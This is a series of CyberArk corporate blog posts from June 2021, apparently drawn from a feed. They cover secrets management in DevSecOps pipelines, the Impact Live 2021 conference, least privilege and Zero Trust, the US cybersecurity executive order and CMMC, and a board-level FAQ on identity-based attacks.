IT modernization in the federal government sector is more than just plugging in new technology. It’s about changing the way government workers operate to be more efficient, effective, and transparent — all while bolstering cybersecurity to help secure critical systems and protect citizens.

“As digital technology evolves, our adversaries are releasing updated capabilities and features just as quickly as we are,” said CyberArk DevSecOps specialist Mark Hurter during his talk at the recent GovLoop virtual summit “7 Perspectives on Transforming Government.” Staying ahead of emerging threats requires a proactive — and increasingly automated — approach to security. Here, we summarize some of his key presentation messages, highlight a real-world federal success story and look at how automation plays a big role in the broader push to DevSecOps.

Unprotected Secrets in the DevOps Pipeline Put Agencies at Risk

Recent software supply chain attacks such as SolarWinds and Codecov have highlighted new levels of attacker creativity and opportunism, the growing risk to CI/CD pipelines and the potential for amplified damage and disruption. In response, the White House last month issued an executive order emphasizing the need for enhanced software security to strengthen the country’s cyber resilience.

The security of the CI/CD pipeline, the backbone of government DevOps environments, and applications themselves are vital to federal agencies’ ability to perform critical functions and achieve their missions. But speed is just as important. “Whether the end-user is a warfighter in the military or the public-at-large, federal agencies must be able to rapidly deliver new capabilities and remediate vulnerabilities in lockstep to deliver end-user advantage and reduce risk,” said Hurter.

The government’s progression from traditional waterfall development practices to agile, CI/CD methodologies is helping security, operations and development teams break down traditionally siloed functions and work in concert to get secure code out the door faster.

All of this is made possible through automation. Likewise, automation and privileged access go hand-in-hand. Take Red Hat Ansible, one of the leading automation platforms, for example. In order to execute automation functions such as standing up a virtual machine (VM), managing configurations, or copying, releasing, and re-installing code, Ansible playbooks require, and hold powerful privileged credentials and secrets. Because of this, Ansible and other CI/CD pipeline tools are attractive targets for cyber criminals.

Unprotected secrets, whether in automation playbooks, scripts, code, or elsewhere can put agencies at risk, and also violate federal compliance regulations because they could grant attackers unrestricted access to sensitive government data and infrastructure. And as the number of secrets grows, it becomes exponentially harder for agencies to store, transmit and audit secrets securely.

Case Study: How a Federal Government Contractor Secures and Retrieves Ansible Secrets at Scale

A centralized, automated secrets management approach can help federal agencies, along with organizations providing services to the government, to reduce operational complexity, protect and accelerate digital transformation initiatives and achieve compliance with important standards like FISMA and NIST.

In his GovLoop presentation, Hurter shared a real-world example of this in action. A large defense contractor that managed more than 85,000 networking devices across a federal government environment needed a way to apply configuration changes across this massive tech stack efficiently.

“The only way you can solve that problem was with efficient and secure automation,” Hurter said.

But it had to be done right: that meant forgoing the use of one shared key or small set of unmanaged keys that could unlock access to systems across the environment.

“‘One key to rule them all’ means that not only can your administrator access all 85,000 networking devices, so can an attacker or unauthorized user,” said Hurter. “Very rarely will there be a legitimate need for someone to access all 85,0000 systems. That’s why it’s important to intelligently limit access to only what users need to perform their specified functions.”

The risky practice of storing, or “hardcoding,” secrets within the agency’s automation platform of choice, Red Hat Ansible, was also out of the question. Instead, secrets were placed in a secure repository — bolstered by multi-factor authentication (MFA) — where they could be automatically managed, rotated, audited, and when needed, retrieved quickly and securely. Identities, whether human or machine, can now be managed by role-based access control, while policy-as-code allows the organization to store the current state of the service in version control.

Through streamlined secrets management made possible by out-of-the-box integrations between Red Hat Ansible and CyberArk Conjur, the defense organization can now perform configuration management as code — automating updates (including important security changes) or deploying new assets across the entire network stack in less than two hours. Explore this federal case study in detail to learn more about protecting Ansible secrets and driving operational efficiency with CyberArk.

Securing Automated CI/CD Pipelines Means Security from Inception

Automation is one of several critical enablers of DevSecOps — a broader philosophy that emphasizes the need to integrate security into every phase of the software development lifecycle.

DevSecOps also means automating key security processes, such as secrets management, to keep DevOps workflows moving fast. Adopting the right tools and approaches can help your agency meet these objectives.

But of course, DevSecOps is primarily about people — it requires communication, collaboration, empathy and cultural change. It highlights the need to engage security teams from the start of DevOps initiatives while empowering developers to easily adopt security best practices without slowing down.

“Involve security early and often,” said Hurter. “They should be a partner. They should not be a roadblock.”

He continued, “By securing code at inception, federal agencies can minimize time spent refactoring code because it wasn’t done right the first time, eliminate cycles spent pushing new copies of secrets to new disparate credential stores, respond to incidents faster, and ultimately, focus on delivering more value to end-users.”

Red Hat and CyberArk: Automating and Securing DevOps Together

Watch Hurter’s full presentation, “How to Use Automation Data Securely & Safely in Government” on-demand (free registration required). And visit our team this week at the virtual Red Hat Summit to learn more about CyberArk and Red Hat’s joint efforts to automate and secure DevOps, while supporting organizations in both the public and private sectors on their path to IT modernization. Registered Red Hat Summit attendees can also explore a leading financial institution’s IT automation journey in the on-demand session “Ansible + CyberArk = More secure digital transformation: The CIBC case study.”

For additional resources, discover secrets management made simple, check out our joint solution brief or set up a personalized demo to learn how CyberArk and Red Hat can help you secure your automation workloads.

]]>
Impact Live 2021: Security Teams Gain Application Security Mandate https://www.cyberark.com/blog/impact-live-2021-security-teams-gain-application-security-mandate/ Thu, 10 Jun 2021 16:46:53 +0000 https://www.cyberark.com/?p=119223 Security Teams Gain Application Security Mandate

Cybersecurity teams are starting to play a much larger role in application security as organizations look to implement a more systematic approach to securing software supply chains on an end-to-end basis.

During its virtual CyberArk Impact Live 2021 conference this week, industry experts noted that rather than relying on developers who often lack security expertise to manage application secrets, more organizations are shifting that responsibility to cybersecurity teams with the backgrounds and technical acumen needed to address fast-evolving threats. These teams are employing platforms designed from the ground up to make those secrets available to applications only when they’re required.

Who Owns Secrets Management, Anyway?

It hasn’t always been that way. In many organizations, “ownership” of secrets management — from requirements to platform selection and operations — was never really defined. Many developers shouldered the task themselves, often managing application secrets directly within their applications in the name of simplicity and speed. But if those applications are compromised, all the secrets stored by the developer are readily available in plain text. Given the current emphasis on CI/CD pipeline vulnerabilities, “Security teams are getting responsibility for the application secret management problem, and that’s new,” said Uzi Ailon, Vice President, DevSecOps Solutions for CyberArk, during an “Insider Story: DevOps Subject Matter Experts Share Their Experiences” session.

Cybersecurity teams are now deploying separate repositories to safeguard application secrets that are then made available to applications on-demand via an application programming interface (API).

Organizations are generally either pursuing a prescriptive approach to managing secrets across their entire software portfolio or, at the very least, providing developers with a self-service platform through which application secrets are tightly managed, Ailon noted.

The New CISO Mandate: No Secrets Left Behind

That shift is at the core of a new mandate that chief information security officers (CISOs) now have in the wake of a series of high-profile breaches of software supply chains, noted James Creamer, Identity Security Strategy and Content Architect at CyberArk, during his “The New CISO Mandate: Securing the Entire App Portfolio” session.

Armed with that mandate, CISOs are pursuing a top-down approach as part of an effort to ensure that every application secret is protected. “No secret will be left behind,” Creamer said.

That shift is occurring at a time when many organizations are trying to implement best DevSecOps practices by shifting more responsibility for application security further left to developers. The challenge is that developers are already hard-pressed to keep up with the current rate at which they are being asked to build applications. And if security isn’t automated and integrated into existing workflows, the probability a developer will make a mistake managing application secrets increases with each new project.

Each organization will need to identify the best approach to managing application secrets themselves. Some are prioritizing their efforts based on the level of risk to the business, while others are focusing on applications built by, for example, DevOps teams that are more open to adopting new processes as part of ongoing efforts to automate application development and deployment.

Regardless of who takes responsibility for application security, it’s clear that when it comes to application secrets management there has never been a greater sense of urgency. Cybercriminals are now regularly launching low-level phishing and impersonation attacks against development teams to gain access to credentials and abuse privileges that enable them to compromise entire application environments. Unless, of course, the secrets within those applications are encrypted and then stored in a digital repository that’s really difficult (and expensive) for attackers to try to crack.

Editor’s note: CyberArk Impact Live 2021 has wrapped, but you can still register to enable playback sessions on demand.

]]>
Impact Live 2021: Advancing Zero Trust IT with PAM and IAM https://www.cyberark.com/blog/impact-live-2021-advancing-zero-trust-it-with-pam-and-iam/ Wed, 09 Jun 2021 19:20:27 +0000 https://www.cyberark.com/?p=119187 Impact Live 2021: Advancing Zero Trust IT with PAM and IAM

During its virtual CyberArk Impact Live 2021 conference this week, the company showcased a broad portfolio of security solutions that are central to any Zero Trust approach to securing an IT environment based on identity.

The Changing Nature of Privilege

The need for strong Privileged Access Management (PAM) controls has continued to increase as IT teams look to secure what have become highly distributed computing environments due to the pandemic, digital transformation, cloud migration and the shift left. Not only are end users more likely to be accessing corporate resources from anywhere, but they now expect it, noted Yuval Moss, CyberArk VP Identity Security, in his talk, “What is Identity Security?”

While several years ago only small groups of users (mostly IT admins) were considered privileged, this isn’t the case in today’s cloud and hybrid environments. What’s more, it’s become apparent that each machine — and even individual components of an application — have an identity that needs to be managed. Without the right controls in place, any of these identities can become a privileged identity, opening doors to valuable data and assets.

Similarly, the attacker landscape is evolving. “Cyber attackers have increased in number, sophistication and aggression,” said CyberArk Chief Strategy Officer and Head of Corporate Development, Clarence Hinton, in his keynote. “These factors have combined to lead to an exponential increase in cybersecurity threats facing enterprises across the globe.”

A Security-First, Least Privilege View of Identity-Related Risk

Rather than managing PAM and Identity Access Management (IAM) platforms in isolation, CyberArk is making a compelling case for integrating these capabilities via a unified software as a service (SaaS) platform to achieve and maintain Zero Trust security in the most frictionless way possible.

The company, as part of that effort, showed how organizations can apply policies based on identity and least privilege access rules to desktops or even specific end users using either single sign-on (SSO) or biometric tools.

“PAM and IAM are coming together,” said Khizar Sultan, Senior Director for Product and Solution Strategy at CyberArk during a “Why Integrating PAM and IAM Is Essential to Your Identity Security Strategy” session. “Identity winds up actually being the new perimeter for security.”

CyberArk also stressed the need to protect end users by enabling policies to isolate sessions using a continuous authentication mechanism that makes certain end users are active in a session, in addition to protecting them from cyber attacks aimed specifically at browsers. As an extension of that capability, it’s critical to enable an audit trail that tracks all actions made during a session.

In general, managing the lifecycle of passwords and privileges based on identity within the context of a task will be crucial. End-users need to be able to assign a higher level of privilege in a just-in-time fashion to complete a specific task, based on their specific identity or the role they play within an organization. The goal is to enable organizations to implement Zero Trust policies in a way that doesn’t jarringly disrupt business process workflows. Naturally, there will also be a need to provide the monitoring tools so that IAM and PAM capabilities are being optimally employed.

Most organizations had already begun to gradually transition toward Zero Trust IT architectures. The COVID-19 pandemic simply accelerated that shift once IT organizations realized many employees would continue to work from anywhere for the long run. The challenge is finding a way to seamlessly implement Zero Trust principles and capabilities so employees, customers, and business partners won’t either reject out of hand or, more likely, waste countless hours trying to find a way to workaround.

Editor’s note: CyberArk Impact Live 2021 has wrapped, but you can still register to enable playback sessions on demand.

]]>
Least Privilege in The Cloud (and Everywhere Else) https://www.cyberark.com/blog/least-privilege-control-from-endpoint-to-cloud/ Wed, 09 Jun 2021 13:00:29 +0000 https://www.cyberark.com/?p=119119 Least Privilege Endpoint Cloud

Mark Twain once wrote that “History never repeats itself, but it often rhymes.” This is especially true in the world of cybersecurity. By examining some of the major breaches over the past decade, a repetitive attack chain is clear: external adversaries or internal threat actors target and compromise an identity to launch their attack, then escalate privileges, move laterally, and manipulate privileged access to reach sensitive data. And today, as cloud adoption surges, this pattern is seen acutely in cloud environments.

A Recent History of Identity-Centric Attacks

2013: A privileged insider used legitimate access to leak highly classified government information. The need to minimize standing and unnecessary privileged access to critical systems became a top-of-mind issue for both public and private sectors.

2014: An attack chain involving privileged credential abuse and escalation nearly crippled a leading entertainment company — prompting some organizations to take a closer look at Zero Trust frameworks.

2015: A country’s power grid was attacked when threat actors compromised valid credentials from an employee workstation, escalated privileges and moved laterally to gain control of SCADA systems. More than 225,000 people were left in the dark. 

2016: By abusing privileged credentials, attackers were able to reach SWIFT systems and illegally transfer $81 million in this international bank heist.  

2016-2017: Millions of sensitive customer and personnel records were exposed inadvertently in a string of separate breaches after third parties misconfigured cloud storage databases to allow public access. This highlighted the critical need to protect cloud credentials with strong privileged access controls and improve overall visibility of misconfigurations.

2017: A massive ransomware attack encrypted hundreds of thousands of computers across more than 150 countries. Subsequent research demonstrated that a combination of least privilege enforcement —via removal of local admin rights —and restricting applications were 100 percent effective in preventing ransomware from encrypting files.

2019: By way of a misconfigured firewall, an attacker entered a financial services organization’s cloud provider network and accessed a cloud virtual machine (VM). By assuming an over-permissioned role, the attacker obtained temporary privileged credentials to the company’s cloud database, exposing troves of personal data and costing the organization millions of dollars in regulatory fines.

 2020: This digital supply chain attack was unprecedented in sophistication and scale, but one aspect was all-too-familiar: the compromise of identities and privileged access on-premises and in the cloud. In a post-breach U.S. Senate hearing and numerous briefings, the message was clear: In our mobile, cloud world, identity is the new security battleground and the only practical control plane.

2021: Advanced persistent threat actors found vulnerabilities in a leading employee productivity suite, allowing the unauthenticated attackers to elevate privileges and control infrastructure, whether hosted on-premises or in the cloud. At least 30,000 U.S. organizations were impacted.

Now More than Ever: The Imperative for Least Privilege

Identity-related attacks are clearly nothing new, but they’re happening with alarming frequency in cloud environments, and often targeting cloud-hosted workloads. This makes sense, since 90% of organizations have accelerated their consumption of cloud services since COVID-19, according to a recent Flexera report.

In this era of security uncertainty, organizations are revisiting foundational practices like least privilege — when identities have their privileges and permissions restricted to bare minimum access — to mitigate risk and defend their growing cloud estates.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently issued an analysis report to provide guidance on this front with specific recommendations such as eliminating access from employee personal devices, securing privileged access to cloud services, strengthening access controls with multi-factor authentication (MFA), and adopting a  “Zero Trust mindset.”

Zero Trust = Zero Excessive Privileges

In a Zero Trust cybersecurity model, organizations recognize that as they store their data, applications and infrastructure in the cloud and embrace remote work models, their IT environments are no longer defined by a physical perimeter. Zero Trust architectures reflect this shift away from a static perimeter toward individual users, assets and resources — or, simply, identities. By “assuming breach,” organizations grant no implicit trust to human or machine identities; all must all be continuously authenticated and authorized.

Least privilege access is a core authorization tenant of Zero Trust, recommended by both the U.S. National Security Agency and U.S. National Institute of Standards and Technology (NIST).

By granting identities the minimum necessary privileges and permissions, a compromised identity can be stopped from gaining the privileges needed to progress an attack. In other words, if — or rather, when — a breach occurs, least privilege prevents access to mission-critical infrastructure, minimizing the “blast radius” of an attack. Establishing least privilege also limits the number of entities that can grant or configure new permissions, making it more difficult for attackers to reach their goals.

Least Privilege: Easier Said than Done?

Of course, organizations face notable challenges when implementing least privilege in the cloud. Visibility across distinct environments is one hurdle: Just as organizations must remove excessive privileges for myriad types of endpoints and servers, they must also manage entitlements to access unique varieties of cloud-hosted infrastructure, containers and Kubernetes clusters. This can be even more difficult in cloud environments, where any human or machine identity can be configured (or misconfigured) with permissions to access privileged information. In fact, 19% of all data breaches can be attributed to misconfigured cloud infrastructure, according to IBM research.

And when organizations embrace a multi-cloud strategy — as 92% of them do — the potential for identity and access management (IAM) misconfigurations grows. Based on CyberArk data, we estimate there are more than 23,000 potential permissions that must be properly configured and securely managed across leading IaaS providers.

New CyberArk AWS Marketplace Offerings Accelerate Least Privilege Control and Risk Reduction

Today, we’re proud to announce the availability of CyberArk Cloud Entitlements Manager, CyberArk Endpoint Privilege Manager, and CyberArk Workforce Identity on Amazon Web Services Marketplace. These new offerings underscore our commitment to helping enterprises adapt a risk-based strategy for defending against identity-based attacks as they embrace the cloud, remote work, and other digital transformation initiatives.

Together, Cloud Entitlements Manager, Endpoint Privilege Manager, and Workforce Identity allow organizations to remove excessive privileges and permissions on endpoint devices, macOS platforms, servers, and VMs and throughout their cloud environments, deliver a frictionless user experience and enforce least privilege everywhere. Removing unnecessary privileges helps organizations limit lateral movement and stop privilege escalation to defend against attacks compromising identities.

Learn from History. Lead with Least Privilege

Attackers are zeroing in on identities to compromise cloud environments. For this reason, modern identities deserve Zero Trust. Don’t become part of history’s rhyme. Learn from it and change the verse by embracing a holistic strategy that starts with least privilege. Get started with a CyberArk Cloud Entitlements Manager free trial, a CyberArk Endpoint Privilege Manager free trial, a CyberArk Workforce Identity free trial or visit CyberArk on AWS Marketplace.

 

]]>
Live from Impact 2021: Shaping the Future of Identity Security https://www.cyberark.com/blog/impact-2021-shaping-the-future-of-identity-security/ Tue, 08 Jun 2021 19:00:41 +0000 https://www.cyberark.com/?p=119108 Identity Security CyberArk

In the spirit of looking forward with renewed confidence and optimism, thousands of cybersecurity professionals joined us today to kick off CyberArk Impact Live 2021, the world’s largest virtual gathering focused on Identity Security.

Our 15th annual event offers an immersive two-day digital experience featuring more than 50 keynotes, breakouts, and training sessions. There’s a palpable energy and excitement around shaping the future of Identity Security together.

Evolving in a Rapidly Changing World and Embracing It

In his opening keynote, CyberArk Chairman and CEO Udi Mokady applauded cybersecurity professionals for their tireless commitment, sacrifices, and efforts throughout the extraordinary pandemic-era race to enable new work models — while at the same time defending their organizations against unrelenting attacks.

He outlined three major trends that will influence the months ahead, urging participants to focus and stay the course in a time when “… the demands on each of us as cybersecurity professionals — to protect our organizations, our economies, our government operations and our way of life have never been greater.”

  • Digital transformation and cloud migration are moving full steam ahead. In 2020, for the first time, organizations invested more in cloud infrastructure than in on-premises data centers, going all-in on services from cloud providers to supercharge their digital transformation. Meanwhile, many software development teams adopted new DevOps methodologies to automate processes and enable high-velocity innovation. While these initiatives continue to accelerate, threat actors are now targeting a quickly expanding attack surface, where any user can have some level of privileged access.
  • Identity is the new battleground. The rapid move to work from anywhere dissolved any remaining notions of a traditional network perimeter. Recent findings from the CISO View 2021 Survey underscore this new reality: 97% of security executives are seeing an increase in credential theft, while more than half say attacks on end-users and their endpoints have increased. With this as a backdrop, there’s broad consensus around the value of Zero Trust and a growing sense of urgency for securing privileged access. Senior executives view Identity Security controls as their top priority for making Zero Trust a reality to protect their most valuable resources.
  • Attacker innovation is accelerating. Attackers are upping their game to compromise identities and escalate privileges, so they can gain access to organizations’ most sensitive assets in three major ways. First, they’re using more sophisticated techniques, such as the Golden SAML method used in the SolarWinds digital supply chain attack. Second, they’re getting much more targeted with spear-phishing and impersonation attacks, often focusing on end-users who have high-value access to specific systems. And third, they are becoming bolder and finding more ways to scale their impact, as evidenced by the recent surge in double-extortion ransomware attacks.

Identity compromise is the common denominator in all these attacks — and the abuse of privileged access is almost always a factor in the attack chain. Organizations must evolve their cybersecurity programs by taking a security-first, least privilege view of identity-related risk to help eliminate security gaps.

Transforming the CyberArk Identity Security Vision into Reality

Since unveiling the CyberArk Identity Security vision last year at Impact, we’ve had many strategic conversations with cybersecurity leaders. These discussions have been invaluable in further shaping our strategy and helping to inform our view of the future.

By harnessing these insights — and with a relentless focus on innovation — we’ve evolved the CyberArk Identity Security Platform into a comprehensive set of Software-as-a-Service (SaaS) and self-hosted solutions over the past year. Centered on privileged access management, the platform provides customers a unified and holistic approach to securing standing and dynamic access for any user, across any type of application or system — from anywhere, using any device.

Today at Impact 2021, we announced new software services and platform advancements to help organizations secure high-risk access and broaden protection across cloud and hybrid environments. These innovations extend our commitment to our customers as they drive forward digital transformation, execute on cloud migration initiatives, achieve Zero Trust — and, most importantly, defend against advanced cyberattacks. We’re proud to introduce:

  • CyberArk Dynamic Privileged Access: Drastically reduces risk of standing access by provisioning just-in-time access to hybrid and cloud workloads starting with Linux and Windows Virtual Machines. Dynamic Privileged Access also includes full audit capabilities, providing insight into exactly who accessed what and when. Only CyberArk secures both standing and dynamic access across hybrid and multi-cloud environments while enforcing least privilege controls.
  • CyberArk Secure Web Sessions: Adds additional layers of security to high-risk browser-based applications access via continuous monitoring, re-authentication enforcement, and isolation of malicious processes originating on end-user devices. Secure Web Sessions enables enterprises to record and audit risky user behavior within any web application while maintaining a frictionless user experience.
  • CyberArk Lifecycle Management for Privileged Users: An expansion of existing capabilities, customers can now further expedite employee onboarding, including those with privileged access, and meet audit and compliance mandates more efficiently. Lifecycle Management for Privileged Users integrates with existing solutions and can also work with HR-driven identity management solutions, providing further flexibility to enterprises.
  • In addition to these new SaaS solutions, we unveiled new cloud-native shared services that are available to customers running CyberArk software on-premises, in their own clouds, or managed by CyberArk. Services include a unified identity management, authentication, and authorization layer, AI-powered Identity Security analytics, an integrated Identity Agent, and more. These new services will dramatically improve operational efficiencies and reduce risk for security teams.
  • And in response to feedback from our extensive CyberArk Commons Community of developers engineers and security professionals, we’re proud to introduce Conjur Cloud, a SaaS-based version of our Conjur secrets management solution.

Dynamic Privileged Access and Secure Web Sessions will be generally available by the end of the year. Conjur Cloud and the next iteration of Lifecycle Management capabilities for Privileged Users will be available in 2022.

Moving Fearlessly Forward Together

All of this — our Identity Security vision, platform, shared services, and new solutions — is the culmination of a multi-year effort to define and build a cybersecurity approach for the next decade.

Today, the breadth and depth of CyberArk’s platform is unmatched. We are building a highly differentiated Identity Security Platform centered on privileged access and investing in SaaS while continuing to address self-hosted customer needs.

But of course, there’s much yet to come as we continue to innovate to address current and future Identity Security requirements. We’re honored and humbled to be on this journey alongside our customers and partners. Together, we can make huge FUTURE IMPACT as we go forward — for your careers, your organizations, your communities and for the cybersecurity industry as a whole.

If you haven’t registered for CyberArk Impact Live yet, there’s still time! We’ve got another exciting day lined up for tomorrow, Wednesday, June 9. Register now to hear inspiring keynotes, attend live technical sessions with industry visionaries, hear new research presented by CyberArk researchers and also enable playback sessions on demand.

]]>
Why Cybersecurity Executive Order Takes Big Steps Toward Marshaling US Cyber Defenses https://www.cyberark.com/blog/why-cybersecurity-executive-order-takes-big-steps-toward-marshaling-us-cyber-defenses/ Thu, 03 Jun 2021 13:53:17 +0000 https://www.cyberark.com/?p=118698 Cybersecurity Executive Order

Sometimes, it takes a significant event — a “forcing function” — to catalyze significant change. It can even take more than one. A series of cyber attacks with real-world implications and far-reaching impact recently culminated into a moment of action. On May 12, the Biden administration issued a highly anticipated executive order aimed specifically at strengthening the country’s cybersecurity defenses — with strong emphasis on Zero Trust.

According to a White House statement, “This executive order makes a significant contribution toward modernizing cybersecurity defenses by protecting federal networks, improving information-sharing between the U.S. government and the private sector on cyber issues, and strengthening the United States’ ability to respond to incidents when they occur.”

The order also calls for stronger cybersecurity standards for technology partners that provide software and services to the federal government — building on earlier efforts such as the Cybersecurity Maturity Model Certification (CMMC) introduced by the Department of Defense in 2020.

While the executive order focuses primarily on federal agencies and their partners, government officials and cybersecurity pundits alike believe it could drive sweeping change across the private sector — both nationally and abroad.

Kevin Corbett, Director of U.S. Federal Business at CyberArk, has been working in the federal cybersecurity space for more than 25 years. It’s a world he knows intimately, from civilian agencies to the Department of Defense to the intelligence community.

Asked for his impressions of the executive order and its intended implementation, Corbett says he sees it as more than just words on a paper. “We’ve witnessed a 10-year evolution as the government has shifted from a governance and compliance focus to a more proactive, risk-based approach to cybersecurity that drives far better, more sustainable outcomes,” he explains.

The push toward cybersecurity standardization began, Corbett says, in earnest well before SolarWinds, after the massive 2015 Office of Personal Management (OPM) breach. While the government has been making moves in the right direction, progress has not always kept pace with the speed of attacker innovation.

Adding Teeth to the Paper Tiger

Corbett applauds the executive order as a significant milestone for national security but knows there is still work to be done here. “Right now, it reads like a paper tiger,” Corbett says. To drive action and long-standing impact, guidance must become more prescriptive. That starts with standardizing definitions for abstract concepts and best practices and extends to the enforcement of punishment for non-compliance — something not currently laid out in the order.

It’s similar to a person trying to improve their health, he notes. A doctor simply saying “get healthier” doesn’t have the same impact as giving you specific steps to follow, such as switching from soda to water or walking 30 minutes every day. Once you’ve tackled these basics, you can then move on to more advanced exercise or diets — the point being that it’s easier to demonstrate progress and improvement once these specifics are laid out.

Clarity is key, Corbett says. For example, the executive order says that agencies must submit a new plan on moving to Zero Trust. But how exactly is Zero Trust being defined, and where, he asks, “… does the rubber meet the road?”

It may be impossible to establish one set of rules or one type of protocol.

“One of the harshest realities that we have in our industry is the pace of innovation, the pace of application development, the pace of new platforms being developed, new business processes — even new hardware platforms are able to outpace our ability to keep those things secure,” Corbett says.

Rather than attempt to plug holes or fortify defenses, it is more effective for all to adopt the “assume breach” mentality that fuels Zero Trust. This will keep agencies and organizations from trying to figure out where the next breach will happen (a futile effort that is doomed to always be a step behind) and instead just assume the bad actors are already inside. The key, then, is to make sure you have the processes in place to make it as difficult — and as costly — as possible for attackers to reach their goals.

Leveling Up

In fact, this is part of what the CMMC aims to do. First introduced by the Department of Defense in January 2020, this standardized framework represents an important step in strengthening the nation’s cyber resilience. In a sense, it’s been laying the groundwork for much of what the executive order is aiming to accomplish — namely, modernizing the federal government’s cybersecurity, fortifying the security of software for purchase by the federal government and, perhaps most importantly, improving the communication and collaboration between the government and private sectors so that there is more of a team approach to cyber attack defense and response. “The CMMC is the DoD’s first effort into a more thoughtful and hands-on approach to supply chain security,” Corbett says.

Created in response to compromises and breaches stemming to vulnerabilities in third-party contractors’ IT systems, the CMMC applies to more than 300,000 companies in the DoD’s supply chain. Rather than having contractors self-report that their systems are compliant (a bit of “take our word for it”), the CMMC lays out a five-tier system that rates a company’s maturity and compliance. Each tier represents, essentially, how close the company comes to sensitive information.

A landscaping company that does work for government agencies, for example — even if there is a possibility it comes into contact with Personally Identifiable Information (PII) — would nonetheless be seen as a lower-tiered organization and would have far less stringent regulations (and expectations). A contractor building advanced weapons systems for the military, on the other hand, would require the highest levels.

Over the years, though, Corbett says he’s seen inconsistencies even within the government itself, which adds complications to its quest to regulate others through a comprehensive policy. He explains, “Agencies get grades, and we see As and Bs, but we also see Ds and Fs. And the reasons why can be numerous — from budget to a dearth of qualified cybersecurity professionals.”

Corbett suggests the government may need to reach out to cybersecurity experts across sectors to create a set of best practice guidelines and standard definitions — organizations that, say, have been pushing for Zero Trust maturity for some time now. It will take a lot of collaboration, guidance, and a host of perspectives and backgrounds to keep it moving forward, a phrase used frequently by him and his colleagues, Corbett says. “There is no silver bullet relative to cybersecurity. It’s a team sport.”

When all’s said and done, the CMMC is positioned to be another useful tool rather than a be-all, end-all solution, Corbett says. It’s not perfect; it’s a bit of a work in progress, but it’s a push in the right direction toward more comprehensive guidelines and, ultimately, a better understanding of how to tackle cybersecurity seriously, consistently, and permanently.

]]>
How to Communicate the Identity Security Imperative to Your Board https://www.cyberark.com/blog/how-to-communicate-the-identity-security-imperative-to-your-board/ Tue, 01 Jun 2021 13:00:29 +0000 https://www.cyberark.com/?p=118659 Communicate Identity Security to Board

Despite numerous business-level issues jockeying for space on the board agenda, there isn’t an executive team on the planet that isn’t talking about cybersecurity today. The SolarWinds breach, unrelenting ransomware attacks and evolving digital threats have kept the topic high on the priority list.

As a CISO, security leader or director of IAM, you may feel some relief that security responsibility has spread far beyond the walls of IT, across lines of business and into the board room. But this relief is likely tempered by increased scrutiny and pressure to communicate cyber risk in ways that executive leadership and the board of directors can more easily understand and act on.

Gartner IAM Summit: “Cybersecurity Begins and Ends with Identity”

In her recent Gartner Identity & Access Management (IAM) Summit keynote, Tricia Phillips, Senior Director Analyst, Gartner, described how the COVID-19 crisis disrupted every aspect of life; introduced a new distributed, decentralized world; and accelerated transformation projects. In this sustained period of disruption, she noted, identity has become the “ultimate attack surface,” and now “cybersecurity begins and ends with identity.” She urged IAM leaders to take their place as the first, and often last, line of defense against the malicious use of human and machine identities.

Communicate with Confidence: An Identity Security FAQ for Executive Leadership and the Board

With identity as the new security battleground, it’s clear an assume breach mentality, based on Zero Trust principles of “never trust, always verify,” is absolutely critical. You’re living and breathing this reality every day but may be searching for ways to strengthen your message for non-technical business decision-makers. Use the following FAQ to guide your board room discussions and help articulate why Identity Security matters now — without getting lost in the weeds.

Q: How can we protect our environment from advanced attacks like those seen in the news?         

A: Cyber attackers are constantly innovating, and even the strongest defenses can be breached. Because of this, we are enforcing multiple layers of security to reduce the greatest amount of risk. And by “assuming breach,” we’re focused on finding and stopping threats from within before they can reach critical systems and cause harm.

We know that nearly 100% of major cyberattacks follow a similar attack chain: 1) Steal and abuse the identities and credentials to get inside; 2) Use these legitimate credentials to move around the network looking for high-value targets; 3) Exploit privileged credentials that provide powerful access to accomplish their goals.

Identity-based security controls are critical for detecting and thwarting attacks that have already made their way inside the organization’s infrastructure. With them in place, we can focus on protecting our most valuable assets to prevent data theft and disruption. Without them, we are at risk of a data breach similar to the major attacks that keep making headlines.

Based on recent Gartner guidance* and analysis of several major breaches, we know what specific improvements are needed in to minimize exposure. During an initial rapid risk reduction effort, we will put in place key controls that make it much more difficult for attackers to carry out these types of attacks against us.

Dig deeper: Learn why adopting a “sprint mindset” is one of the most important factors in achieving rapid risk reduction. It helps spark a sense of urgency and progress — without the overarching pressure of resolving an actual breach.

Q: Why are privileged identities and credentials a priority compared to other security goals?

A: Identities are everywhere in our IT environment. And due to the mobile cloud-based nature of our business, every corporate identity — both human and machine — can have privileged access under certain conditions. For example:

  • A developer who requires access to source code to create new software offerings
  • An application that needs high-level privileges to access corporate resources to perform its intended task
  • A third-party vendor who needs to access sensitive corporate data remotely to deliver services

According to Gartner, “The identity and access management (IAM) system is clearly a rich target opportunity for advanced attackers” and “privileged accounts are a primary target.”*

With privileged accounts and credentials, an attacker can access intellectual property, business secrets, and sensitive customer information. And with high levels of access to information systems, the attacker can also deactivate existing security technologies, such as multi-factor authentication, data encryption, firewalls, and detection systems — often without raising red flags.

Gartner states that “Mitigating this risk often requires privileged accounts to be managed by a Privileged Access Management (PAM) tool. PAM tools help vault privileged passwords, limit accesses to authorized users, rotate credentials frequently and monitor the usage of privileged accounts.”*

Dig deeper: Explore the anatomy of the SolarWinds attack chain to see how threat actors used highly privileged credentials to successfully bypass endpoint and network-based security controls.

Q: What techniques are attackers using to launch identity-based attacks?

A: According to the latest Verizon Data Beach Investigations Report 2021, 85% of breaches involve the human element. The first step in the attack chain is often marked by a spear-phishing or impersonation attack aimed at stealing an identity’s credentials. Users are tricked into clicking on a link or opening an attachment in an email that downloads malware to their workstation. Ransomware infections work in similar ways — and as tactics have evolved, the number of successful ransomware attacks has doubled since last year.

Once the malware is downloaded onto a desktop, laptop, or server, attackers can gain entry to the environment. For example, in Windows environments, they take advantage of the way devices store credentials: Password “hashes” are saved in computer memory for all users who have recently logged into that machine. By stealing the hash for an administrative password, an attacker can get access to multiple machines. They search each machine’s memory for other password hashes that, in turn, provide access to more valuable machines like database servers or, the biggest prize, the domain controller used to manage access to all computing resources. Once they reach the domain controller, they can create “tickets” to log into any critical asset on the network, shut down security systems and take full control of information systems.

Dig Deeper: Explore the unique challenges of securing identities in hybrid cloud environments and three real-world attacks

Q: Which user groups within our organization are most at risk of identity-based attacks?

A: Attackers used to go straight for IT admins with high levels of access. But recent research shows that non-technical user populations are being targeted with increasing frequency, such as business users with access to sensitive data (i.e., payroll and HR), senior leadership, and third-party vendors.

